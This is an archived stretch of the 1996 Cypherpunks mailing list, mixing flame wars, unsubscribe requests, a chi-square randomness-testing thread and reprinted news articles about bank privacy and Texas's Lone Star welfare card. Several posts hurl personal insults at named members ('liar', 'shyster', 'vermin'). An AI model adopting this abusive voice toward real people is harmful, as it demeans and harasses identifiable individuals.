Content-Type: text/plain


Jim Ray <jmr@shopmiami.com> writes:
> Ok, Perry. I guess we're all coming over to your list now. <sigh>
> JMR

Good riddance.

Does anyone know the e-mail address for Judge Kosinski? I'd like to expose
Jim Ray as a liar and a hypocritical shyster.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 4 Dec 1996 04:34:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Culling the proles with crypto anarchy
In-Reply-To: <199612040602.AAA05560@manifold.algebra.com>
Message-ID: <k8ueyD66w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ichudov@algebra.com (Igor Chudov @ home) writes:
> Dr.Dimitri Vulis KOTM wrote:
> >
> > Jeff Ubois <jubois@netcom.com> writes:
> > > secretary. In 47 states welfare pays more than a janitor earns. Indeed, i
> > > the 6 most generous states, benefits exceed the entry-level salary for a
> > > computer programmer.
> >
> > Igor may be in a better position to comment on welfare benefits in Oklahoma
> > but I find the above statement highly questionable. New York is one of the
> > most generous states. An entry-level computer programmer with a B.S. and
> > no work experience fetches 45K on the average. Sure beats welfare.
> >
>
> I am not an entry-level computer programmer, sorry.

Too bad. It's a well-paying job. :-)

Instead of trying to hack sites in Norway (quite ineptly) and getting caught,
why don't you finish the misc.jobs.* robomoderator and run the proposal.
I guess writing code is un-"cypher punk".

"Eiffel programmer" is an oxymoron. Read Bertrand Meyer's Web page.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 4 Dec 1996 04:35:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PRIVACY: X-No-Archive and mail.cypherpunks
In-Reply-To: <199612040457.WAA05128@manifold.algebra.com>
Message-ID: <yoVeyD67w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ichudov@algebra.com (Igor Chudov @ home) writes:
> Dimitri Vulis, for example, archives all my messages just in case.

Nope - only the ones I think might be useful to me and my friends.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: logos <logos@c2.net>
Date: Wed, 4 Dec 1996 07:16:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <Pine.BSF.3.91.961204070229.25120B-100000@blacklodge.c2.net>
MIME-Version: 1.0
Content-Type: text/plain



Dimitri Vulis wrote:

> Lame losers who call themselves "cypher punks" and bend
> over for John Gilmore.

     It is obvious that you, Dimitri Vulis, intend to be
disruptive to the operation of this list. I have politely
asked you several specific questions about your motives.

     I am politely asking you again, Dimitri Vulis, why are
you unwilling to rationally and politely discuss whatever
grievances you have with specific Cypherpunks? I believe
you are capable of rational discourse, you allegedly have
some academic credentials so you must have a passing
familiarity with formal debate. Why are you unwilling to
join this discussion with anything other than immature
insults? If the facts are on your side, a reasonable 
demeanor can only enhance your arguments. If the facts
are not on your side, why can you not graciously admit you
are wrong and withdraw your accusations.

     I have been unfailingly polite to you. Do you have it
within your character to respond to me in kind?

     Thank you for your attentions to this matter.

Logos out




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 4 Dec 1996 07:38:42 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Silence is not assent (re the Vulis nonsense)
In-Reply-To: <32A3BBD6.1ECA@gte.net>
Message-ID: <32A59AA0.1C89@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> At 3:05 AM +1300 12/4/96, Paul Foley wrote:
> >So Tim May's silence in response to Vulis's nonsense, while some
> >others came out in his favour "argues (not proves, just argues)
> >heavily in favor of Dimitri" too?  Yeah, sure!  Wanna buy a bridge?

> Actually, I've gotten several comments in e-mail to this effect, that if
> I'm not actively defending myself, maybe I'm guilty. Most were written
> roughly along the lines of:

[snippo]

> As to the ramblings of Dale Thorn about how John Gilmore has an obligation
> to provide services on his machine, well, I gave up on Thorn a long time
> ago. (In fact, I seem to recall a Dale Thorn I killfiled years ago on the
> Extropians list...maybe I'm confusing his name with someone else, but it
> sure rings a bell.)

Since I wasn't on the Internet before, the answer is no.

As to Dale insisting on Gilmore providing services, the answer to that
is clear if you actually read my posts, which you apparently claim to
have done, yet claim not to have done since you "gave up" a long time
ago.  Which is it, Tim?

Tim May writes on certain topics a la "Crypto Anarchy and Virtual
Communities" with a passion that is compelling, if not entirely
convincing, yet this "leader of cypherpunks" is pitifully out of his
element dealing with a truly rational person such as myself, since in
Tim's universe, emotion seems to be the more desirable substitute.

BTW, I never suggested guilt via not answering up to the list on any
topic.  I said it would have been clearer to the list subscribers if
John had explained things himself instead of having a plethora of
defenses coming from hacks like yourself, who don't represent John.

If you, Sandy, and the other offenders *really* want to keep the noise
down, then next time ask John directly for a reply, and if none is
forthcoming, say to the list *once*, "John will not answer up", etc.,
and let the subscribers draw their own conclusions from the silence,
instead of from your inane "defenses".





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jens.melander@vpress.se (Jens Melander)
Date: Tue, 3 Dec 1996 22:41:33 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: No Subject
Message-ID: <01BBE1B6.8E8BBA80@modem-2.vpress.se>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe cyberpunks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 4 Dec 1996 05:30:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Angel and Javier can't unsubscribe!
In-Reply-To: <v03007801aecae3e3d400@[207.167.93.63]>
Message-ID: <PgyeyD69w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> writes:
<Racist garbage, this time directed at Hispanics>
> I'm beginning to think that Cypherpunks appeals especially to morons.
>
> --Tim May

Me too.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 4 Dec 1996 05:15:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: OPE_nup
Message-ID: <1.5.4.32.19961204131259.0069a9d0@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Two reports on BSA's letter Monday to Gore opposing crypto 
export regulations as "headed in the wrong direction." And
claims the administration has "significantly backtracked" since
announcing the new policy October 1. IBM, MS, et al are 
withdrawing earlier support for it.

Without change, BSA said, encryption export policies will fail as 
did Administration policy of Clipper.

-----

OPE_nup





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Boursy <boursy@earthlink.net>
Date: Wed, 4 Dec 1996 05:12:53 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: The Rise and Fall of Cypherpunks WAS [Re: the Dennings]
In-Reply-To: <Pine.SUN.3.91.961203233536.10915A-100000@crl11.crl.com>
Message-ID: <32A579A8.718@earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort wrote:
> 
> C'punks,
> 
> On Tue, 3 Dec 1996, Dave Hayes wrote:
>
>> The very existance of the "profane" keeps the "sacred" in
>> existance as well. If you cannot see that, then John Grubor's
>> lesson is wasted on you.
> 
> If this bit of verbal legerdemain makes any sense at all
> (Logos?), then Grubor must be personally responsible for the
> existance of every saint on the Catholic calendar...not.


  Well saints come on go on the Roman Catholic calander--doesn't
mean a hell of a lot.

  Dr. Grubor does an excellent job of bring the vermin out of
the woodwork.

                        Steve




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Tunnicliffe" <Tunny@inference.com>
Date: Wed, 4 Dec 1996 08:23:35 -0800 (PST)
To: "'Charley Musselman'" <c.musselman@internetmci.com>
Subject: [Noise]RE: Modulating the FM noise spectrum considered infeasible
Message-ID: <c=US%a=_%p=Inference%l=LANDRU-961204162128Z-13248@landru.novato.inference2.com>
MIME-Version: 1.0
Content-Type: text/plain


Charley Musselman writes:
>At 10:38 AM 12/3/96 -0500, Bob Hettinga wrote:
>>At 9:52 am -0500 12/3/96, James A. Tunnicliffe wrote:
>>> At 2:55 am -0500 12/3/96, Timothy C. May wrote:
>>>> [...]Having said this, Johnson noise makes a superior noise source,
>>                          ^^^^^^^
>>>> if a physical source is desired.
>><snip>
>>>Yours makes NOISE?  Impressive...
>>>
>>>In this case, I guess entropy is preferable to atrophy, though.  :-)
>>
>>Indeed.
>>
>>I've found that my Johnson only makes noise with the proper, er,
>>peripheral, though...
>
>Geez, guys, what's this?  Pound the physicist day?  Johnson noise
>is the Brownian motion of electrons in an electronic circuit.  It
>is the irreducible noise, often measured in temperature (obvious?)
>Cheers,  Charley

And to think some folks perceive physicists as lacking a sense
of humor...

Johnson (n., [vulgar slang]) A euphemism for penis.
joke (n. [L. jocus]) 1. Anything said or done to arouse laughter,
   as a humorous anecdote  2. a thing done or said merely in fun

Tunny
(steadfastly resisting any temptation to attempt humorous comment
on "Brownian motion")
======================================================================
 James A. Tunnicliffe   | WWWeb: http://www.inference.com/~tunny
 Inference Corporation  | PGP Fingerprint:   CA 23 E2 F3 AC 2D 0C 77
 tunny@Inference.com    |                    36 07 D9 33 3D 32 53 9C
======================================================================




begin 600 WINMAIL.DAT
M>)\^(A\0`0:0" `$```````!``$``0>0!@`(````Y 0```````#H``$(@ <`
M& ```$E032Y-:6-R;W-O9G0@36%I;"Y.;W1E`#$(`06 `P`.````S <,``0`
M" `5`!P``P`?`0$@@ ,`#@```,P'# `$``@`%0`=``,`( $!"8 !`"$````P
M.39&131!,#!&-$1$,#$Q.3,P0S P04$P,$$U1C8P1 `:!P$-@ 0``@````(`
M`@`!!( !`$(```!;3F]I<V5=4D4Z($UO9'5L871I;F<@=&AE($9-(&YO:7-E
M('-P96-T<G5M(&-O;G-I9&5R960@:6YF96%S:6)L90`2& $#D 8`U <``!H`
M```#`"8```````,`-@``````'@!P``$````W````36]D=6QA=&EN9R!T:&4@
M1DT@;F]I<V4@<W!E8W1R=6T@8V]N<VED97)E9"!I;F9E87-I8FQE```"`7$`
M`0```!L````!N^'D]7.@Y&PV30\1T),,`*H`I?8-``4RJ;<``P`N```````#
M``80&<2TJ ,`!Q!;! ``'@`($ $```!E````0TA!4DQ%64U54U-%3$U!3E=2
M251%4SI!5#$P.C,X04TQ,B\S+SDV+3 U,# L0D]"2$545$E.1T%74D]413I!
M5#DZ-3)!32TP-3 P,3(O,R\Y-BQ*04U%4T%454Y.24-,249&10`````#`! 0
M``````,`$1 ``````@$)$ $```"B! ``G@0``-$'``!,6D9UB!)=P_\`"@$/
M`A4"I /D!>L"@P!0$P-4`@!C: K <V5T;C(&``;#`H,R!$8"`'!P<G$Q( A5
M![("@S.7`\8'$P*#-!4/9C4#Q4,3@Q(B<W1E;0* ?1<*@ C/"=D[&9\R-34/
M`H *@0VQ"V!N9S$PWC,4\ L*$O$+\F,`0!/@41'!;&5Y!=!U!!!EFFP#@G<%
M$!AP<SH*A8P^005 ', Z,S@5< )-(+ R+S,O.38`("TP-3 P+""@0F]B($@2
M`'0+@'1G81^1;QAP( <@@CGD.C42(&%M(<0A1B(@!DHD@ >102X@5'62;@,`
M8VP&D&9E(P[6/A5P!4 R)$ U)'\B("L'82,P:![@0R8036$G'N F_B?@6RXK
MP%U()&%V(L$@<PMP9"!G*> $`"6!;V@`@ (@(-QN;P0`)M `P&L'D2+P^'-U
M< 9Q!;$MI"U@"'!H8V4L(W<@,'\Q!EYO,A0J^@:0+E%P*? `D&-_!T O93,P
M!" -L "0&:$N22-W/',#`' ^)UA9!PAA!" N!$Y/25-%<C\Q`$EM$Z 'D "0
M=FYE*\$G6"=820.@+,(@QS/@$? B($D@9PI0!!'U"?!T`V!P'N TD3@Q)L#N
M<@&@'L LL&\H<#NB*? G(B IX A@9V@F$" Z_"TI(W<C=SH@#; U&C[X^B<X
MD" "$"9 +*(]$"WP]Q[@+28"(&P>X"X$+:0#\/\IX"RQ)M 3H#O !) B($2A
M[R-W+J(SD#QQ;#V'.,@@%GI'">!Z(B [(!A0(B!WW4'1)P0@+,(WX5!!=41!
M]S.C! `%0&0J8#?A+2L@%NLTD40B0@-@=P,``Y$IP?\NT$*A,U ?0 60.Z$&
M,0N /RAP`Z!.)B9P.I T\&-U<Q_ /@%)=$P--/ 9H75_2H \HBVC(B!-\!AP
M36%E_SJP"' )@$ZR&'$NH3T04U'\("@B4"P@"&!)4#Y7'H"_"> 1X"(@'G8*
MA0J%04&2<SSP+,%N:R]A!X!!46S^:SP1!) OL#B!2B@N000@^0M@8VLL,BYA
M"?!+YTWQ=&AU!&!R.+@*A2TF*(1N+B(@6W9U;"+@Y07 <QR"72D5<#MP+I#]
M1#!M! `HD (0!< NH ,`<G,U-FIO+B!=XBN@3-<F$&$04 !S7Q$Q)A!7D.YY
M6 (L506Q9 (@/,0#8/\?$";0"V ]T1AP1/<Q`5I1_R+P7!-4X4[A!9!CH!AP
M,0#^,B80(O!BQ&.C!;$L<P> ]QF@0N%.P68F0%:\)C)6IJ(H&&%A9&8ZL'1"
MX?\X04J16L-BH%/#`9!-HSSC]VSC9@@%H&T'@ (P6W8#H.HB3/TB/E8]<7]R
MCW.?/72O/64F):\FLC$`?"!B5W?@96(Z7 `"0'#0.B\O=WC +@N /&'+"? O
ML"YNT2]^5$!JF.<X`'D6$^%R< 6P;31WL>!01U @1B+!!) 3H!T+@'1X,%8A
M7T R,R!*11(@1GW 04,H($1D(#!^4#<W929Y\T"_>L=YDC$"=\" _X$@,R&P
M8# W($0Y@B!]P#.5?H S$B U?< Y0W$/OX2OA;^&SW5.5KP8P0"*````0 `Y
M`"#VV#/_X;L!`P#Q/PD$```"`4<``0```#(```!C/553.V$](#MP/4EN9F5R
M96YC93ML/4Q!3D1252TY-C$R,#0Q-C(Q,CA:+3$S,C0X`````@'Y/P$```!*
M`````````-RG0,C 0A :M+D(`"LOX8(!`````````"]//4E.1D5214Y#12]/
M53U.3U9!5$\O0TX]4D5#25!)14Y44R]#3CU454Y.60```!X`^#\!````%0``
M`$IA;65S($$N(%1U;FYI8VQI9F9E``````(!^S\!````2@````````#<IT#(
MP$(0&K2Y" `K+^&"`0`````````O3SU)3D9%4D5.0T4O3U4]3D]6051/+T-.
M/5)%0TE0245.5%,O0TX]5%5.3ED````>`/H_`0```!4```!*86UE<R!!+B!4
M=6YN:6-L:69F90````! ``<P<#5O//KANP% ``@PX-Y -/_ANP$#``TT_3\`
M``(!%#0!````$ ```%24H< I?Q ;I8<(`"LJ)1<>`#T``0````$`````````
M"P`I```````+`",```````(!?P`!````40```#QC/553)6$]7R5P/4EN9F5R
M96YC925L/4Q!3D1252TY-C$R,#0Q-C(Q,CA:+3$S,C0X0&QA;F1R=2YN;W9A
8=&\N:6YF97)E;F-E,BYC;VT^`````,I+
`
end




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 4 Dec 1996 05:40:42 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: The Rise and Fall of Cypherpunks WAS [Re: the Dennings]
In-Reply-To: <32A579A8.718@earthlink.net>
Message-ID: <DZyeyD70w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Stephen Boursy <boursy@earthlink.net> writes:
> Sandy Sandfort wrote:
> >
> > C'punks,

See punks post. See punks rant. See punks flame. Laugh, laugh, laugh.

> > On Tue, 3 Dec 1996, Dave Hayes wrote:
> >
> >> The very existance of the "profane" keeps the "sacred" in
> >> existance as well. If you cannot see that, then John Grubor's
> >> lesson is wasted on you.
> >
> > If this bit of verbal legerdemain makes any sense at all
> > (Logos?), then Grubor must be personally responsible for the

"Logos" suffers from verbal diarrhea and can only be pitied. Anonymous
cowards like him are the worst enemy of crypto-enhanced privacy.

> > existance of every saint on the Catholic calendar...not.
>
>   Well saints come on go on the Roman Catholic calander--doesn't
> mean a hell of a lot.

We have a Greek Orthodox church of St. Dimitri not too far from here.
They mistakenly think that I'm Greek and send me the same newsletter
they send to everybody else named Dimitri. Some of it is in English,
so I learned quite a bit about the life of the original St. Dimitri:
He was a foul-mouthed Greek who lived in 3rd century CE and got into
trouble for badmouthing the Romans and other Pagans. I suppose he's
an RC saint too. I used to work for the Jesuits - very educational.

He is not to be confused with the Russian St. Dimitri Donskoy who beat the
shit out of the Mongols. That was after the schism, so he's _not RC saint.

>   Dr. Grubor does an excellent job of bring the vermin out of
> the woodwork.

Yes - thank you Dr. Grubor for your fine work.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Wed, 4 Dec 1996 09:17:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Codebreakers on the shelves!
Message-ID: <3.0.1.32.19961204090346.010a4898@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


The Codebreakers by Kahn is available at some stores.  (Powell's Technical
books in Portland, OR has copies.  It is right next to Applied
Cryptography.)  It has not filtered down to some ordering systems, so some
bookstores claim it is out of print.

Warning:  The book is $65.00 hardbound!  (It is also *NOT* a small book.
It is large.  About 2000 pages by my guess.  (Maybe more.  I was being
pulled out of the bookstore at the time.  My wife was trying to save me
from the evil mind control rays of Powell's Tech books.)

I know what is on my shopping list for Christmas. 
---
|        "Spam is the Devil's toothpaste!" - stuart@teleport.com         |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clay Olbon II <olbon@ix.netcom.com>
Date: Wed, 4 Dec 1996 06:28:01 -0800 (PST)
To: Eric Murray <cypherpunks@toad.com
Subject: Re: more IPG and random numbers
Message-ID: <1.5.4.32.19961204142607.006a18bc@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:24 PM 12/3/96 -0800, Eric Murray wrote:
>I did some more experiments with the IPG stream-cipher
>algorithim and random number tests.  Since IPG claim that their
>algorithim passes chi-square tests of randomness, I found
>a chi-square test program.  It's written by Peter Boucher
>and was posted to sci.crypt in '93 (<2bum8sINN98j@roche.csl.sri.com>).

Eric,

The chi-square test is fairly easy to implement.  Understanding the
alogrithm and interpreting what the test results mean is as important as a
proper implementation.  An excellent text that covers testing PRNGs
(including, chi-square, KS, runs (up, down, above & below the mean), and
autocorrelation) is Simulation Modeling & Analysis, by Law & Kelton.

>> Does the 'runs up' (or 'runs down') test with run-length equal to two
>> get me anything over the standard chi-square test?  I left it in.

Yes.  It tests yet another aspect of "is the data truly random?"

>First I ran the output from my version of the IPG algorithim that I
>posted a couple days ago :
>
>% ./boucher < ipg.out
>Occurances:  n =  12000000, V=-8375833.71
>Character occurances non-random
>Successions: n =     46875, V=62287.82
>Character successions non-random

Unless the V is a typo, there is an error in the code.  The chi-square
statistic can never be negative.

>Then I ran output from a test RNG that's basically a loop around random():
>
>% ./boucher < myrandom/out
>Occurances:  n =   3414720, V=213050.62
>Character occurances non-random
>Successions: n =     13338, V=1143.41
>Character successions non-random

I did considerable testing on random() a while back.  It is actually quite
good at producing a uniform distribution.  There were other problems however
(notably autocorrelation in triplets).

>Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
>PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF

I suggest you take a look at the chi-square program and check it for errors.
Based on the above observations, I am a little suspicious of your results. 

As a side note, I tend to test PRNGs using stream lengths that are similar
to what I will need in a real use of the generator.  I also test multiple
seeds, because statistically, some seeds will fail.  Of course, testing
multiple seeds has its own problems (see the bonferroni inequality) of which
most non-statisticians are unaware.  

I have been curious for a while about developing a statistical test that
would examine the expected number of failures of a repeated statistical
test. Haven't had the time to look into it yet though - not enough hours in
the day.
*******************************************************
Clay Olbon			    olbon@ix.netcom.com
engineer, programmer, statistitian, etc.
**********************************************tanstaafl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Wed, 4 Dec 1996 09:59:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Sorry for the "TWIT" messages
Message-ID: <199612041753.JAA18678@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



Don't worry about it. You don't have to send anyone
any more messages to confirm your twit-ness.

diGriz

>
>Hi,
>
>Well seems I had a rather intresting morining. :) After receiving several "Phreak messages
>I went to modify my "twit" scripts. Unfortunatly the changes I made caused ~50 "twit"
>messages to go out. My appologies to anyone who received these messages.
>
>Thanks,
>
>--
>-----------------------------------------------------------
>William H. Geiger III  http://www.amaranth.com/~whgiii
>Geiger Consulting    WebExplorer & Java Enhanced!!!








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jose Luis Delgado <jdelgado@nexus.net.mx>
Date: Wed, 4 Dec 1996 07:49:11 -0800 (PST)
To: Andrew Fairbanks <apf@ma.ultranet.com>
Subject: Re: (no subject)
In-Reply-To: <199612032327.SAA04610@lucius.ultra.net>
Message-ID: <Pine.SOL.3.91.961204095156.8324A-100000@nexus.net.mx>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe cypherpunks




              




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alzheimer@juno.com (Ronald Raygun Remailer)
Date: Wed, 4 Dec 1996 07:34:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Copyright violations
Message-ID: <19961204.093329.12447.0.alzheimer@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


 Bank Mutual Fund Report: December 2, 1996
 
Consumer Bankers Association Adopts Privacy Guidelines 
 
The Consumer Bankers Association has adopted a set of voluntary "best
practice" privacy guidelines that it will offer members for use in
structuring
their own consumer financial privacy programs. This is becoming
especially
important as banking regulators continue to scrutinize banks' sales
practices
of investment products and insurance. 
 
In a related announcement, CBA said that it has scheduled an information
workshop for Dec. 9, where member banks will discuss the implementation
of privacy guidelines and other steps that can be taken to improve
customer
privacy protection. 
 
In adopting the guidelines, CBA stressed that customer confidentiality is
a
long-standing and essential principle of banking; but it noted that
developments in technology have made it easier for financial institutions
and
other companies to collect, store and analyze data relating to their
customers.
The guidelines are intended to help member banks keep their privacy
policies
in step with these advances in technology.
 
"Our director of government relations, Marcia Sullivan, worked closely
with
a committee of Board members for more than a year to design these
guidelines," said Joe Belew, president of the Consumer Bankers
Association.
 
"All of us are proud that their efforts have put our industry in the
forefront 
of
the drive to keep pace with technology in protecting consumer privacy." 
 
"We worked closely with privacy, marketing, and database experts to give
our industry this blueprint for consumer privacy," said Pam Flaherty, a
member of CBA's Board of Directors and a senior vice president of
Citibank. "We are confident that these guidelines will enable our members
to
continue delivering top-quality service and choice, while maintaining the
trust
of consumers." 
 
The announcement of the new guidelines was welcomed by experts who
study issues surrounding consumer privacy. "I applaud CBA for taking this
first, industry-wide step to further protect customers' privacy," said
Alan
Westin, professor of public law and government at Columbia. 
 
"These guidelines should give consumer bankers a solid foundation on
which
to base their future privacy protections, especially as they move toward
new
consumer financial products such as smart cards, money cards, and
Internet
banking." 
 
The CBA workshop on customer information is being conducted in
partnership with the Washington law firm of Morrison & Foerster. The
one-day session will be attended by retail bankers, compliance managers
and
database marketing managers of the member banks. 
 
"Consumer privacy concerns are an understandable result of the advent of
virtual information systems," said L. Richard Fischer, a partner with
Morrison
& Foerster and author of "The Law of Financial Privacy," adding that,
"this is
clearly the time to champion such industry-wide guidelines."
 
  
Houston Chronicle: Sunday, December 1, 1996
 
Gtech Loss 'Significant'; Penalties Light in Welfare Card
Launch 
 
BY POLLY ROSS HUGHES
 
Persistent problems with the Lone Star card -- widely credited for
cutting
food-stamp fraud -- could have cost the company behind it $ 7 million in
penalties had state officials not let it off the hook. 
 
Despite losing a ""significant'' amount of money during the first year of
operation, Transactive Corp., a subsidiary of the controversial lottery
operator Gtech Corp., insists that Texas' Lone Star card for welfare and
food stamp benefits is a model of success.
 
Likewise, Comptroller John Sharp last month sent out a press release
calling
the statewide launch a year ago "a successful experiment in welfare
reform. ''
But a box full of documents obtained under the Public Information Act
tells
the darker side of what Texas Department of Human Services spokeswoman
Jessica Shahin calls the ""yin-yang'' of government contracts. 
 
The Lone Star card is the nation's first grand-scale system to issue
welfare
benefits through a private technology company. 
 
The card, which resembles a credit card, replaces food stamps at the
grocery
store and can be used to withdraw welfare benefits. Use of the card could
be
expanded to include unemployment insurance, child support collections and
other government payments. 
 
Texas is also the first and largest state planning to privatize the
screening of
welfare applicants. State officials intend to arrange a much larger, $ 2
billion
contract with a private company to handle that job. 
 
But a look behind the scenes of the Lone Star card could prove helpful as
the
state moves toward more public-private partnerships. The history of the
contract shows what can happen when the state tries to do too much too
quickly with too little money.
 
Just as the statewide start-up was about to begin, problems with the
card's
help line for retailers and customers were so bad that DHS officials cut
off
payment to Transactive for three months. 
 
"The Lone Star Help Desk continues to function at an unacceptable
level,''
Bob Ambrosino, DHS' director for the project, wrote to Transactive
officials
at the time. "One thing is quite clear. Transactive is not providing the
level 
of service promised in the contract. '' 
 
To make matters worse, the start-up months were marred by several system
shutdowns and technical glitches that made it impossible to process Lone
Star sales electronically. Several grocers complained of lost sales, and
customers went home with less food as a result. 
 
Grocers could ring up $ 50 with handwritten vouchers, but only if they
got
approval via the help line. If they couldn't get through, they could ring
up
sales of no more than $ 25 -- "extremely risky transactions subject to
fraud,''
Ambrosino said. 
 
Complaints rolled in. Among them: A grocer in Midland said he tried
unsuccessfully all day to get through to the help line. ""He stated the
phone
rings and rings -- he literally let it ring over 100 times -- and no one
picks 
it up,'' reports say. 
 
The Lone Star system shut down for 10 days near Christmas at Big B Food
Store in Karnes City, but the help desk repeatedly advised the owner to
unplug the machine and try again later. This didn't work. When the grocer
finally asked to speak to a supervisor, the help desk hung up on him --
twice.
 
In San Antonio, a retailer said he tried for five months to get a
terminal
installed. He called the help desk four times seeking the equipment and
each
time was told it would arrive in a week. It never did. 
 
DHS itself complained of several breaches of the contract terms,
including
Transactive reports that were habitually late, inaccurate and sometimes
incomprehensible. 
 
""This was an extremely ambitious project. It had a very short time
frame,''
Ambrosino said in a recent interview. "The complexity, the size and the
time
frame all added to the risk. '' 
 
The other obstacle was skimpy funding, stemming from federal and state
requirements that the Lone Star card system had to cost the same as the
old
paper food stamp system. The contract is worth about $ 224 million over
seven years. Three bids were made for the contract, coming from
Transactive, Deluxe Data Systems with EDS, and Citibank with Lockheed
Martin. 
 
"All three vendors had a problem with the fact that we had a limited
amount
of money,'' Ambrosino said. "The bids all came in too high and we had to
start all over. '' 
 
In the second round, Transactive prevailed. "Absolutely, no question,
hands
down, it was the best bid,'' Ambrosino said. "It provided the most
services
for the amount of money that was available. '' One of Transactive's
promises
that proved decisive in winning the contract, records show, was a
superior
help line. The outcome of the bidding drew formal protests from Deluxe
Data
Systems, which argued that Transactive's lack of experience should have
disqualified it. 
 
Since awarding the contract, DHS officials have documented more than $ 7
million in fines they could have assessed because of Transactive's
mistakes,
but the agency never did so. Ambrosino said his contract management team
chose instead to hold the possibility of penalties over Transactive as an
incentive to improve while the system was relatively new. 
 
He also said that DHS withheld $ 6 million in payments to the company
during the statewide start-up as an alternative to actual fines. As the
company
made improvements, DHS reinstated the held-up payments in early 1996. 
 
However, last week, after inquiries from the Houston Chronicle, DHS
decided to fine Transactive $ 345,300 for foul-ups occurring in May, June
and July. Assessing the damages had been recommended as early as Oct. 8
in an internal memo to Ambrosino from Hank Dembosky, DHS' Lone Star
contract manager.
 
Nearly half of the fine is related to an AT&T network failure on July 11,
a
problem that set off a chain of negative reactions. 
 
Retailers again had to process Lone Star sales manually but couldn't get
quick enough authorizations, resulting in lost sales and "associated
inconveniences. '' Finally, with a flood of retailers dialing the help
line for
authorizations, calls from cardholders with questions were abandoned. 
 
The fine includes $ 60,000 for slower system response times than the
federal
government requires, a failure that has occurred every month since the
Lone
Star card went statewide. Additionally, there is a penalty of $ 135,300
for
late or inaccurate reports. 
 
Meanwhile, Transactive reported "significant'' losses for the fiscal year
ending
in February 1996 and predicted more losses to come in the current fiscal
year. Parent company Gtech's most recent annual report points to
investments exceeding $ 61 million for electronic benefits systems to
support
its business in Texas and start-ups in Illinois and Mississippi. 
 
Transactive received $ 24 million from Texas in the state's fiscal year
that
ended in August, said Shahin, the DHS spokeswoman. 
 
Gtech's report to stockholders says Transactive plans to increase sales,
cut
costs and line up more business in other states. If the plan fails to
turn the
losses around ""within a reasonable'' time, the company would consider a
joint venture. 
 
Failing that, Gtech could be required to recognize a loss on part of its
Transactive investment. Transactive is betting on a dual strategy to make
its
start-up investments pay off, said company spokesman Marc Palazzo. 
 
First, it is banking on the Texas contract as a selling point for winning

similar contracts in other states. Transactive also hopes to snare more
business
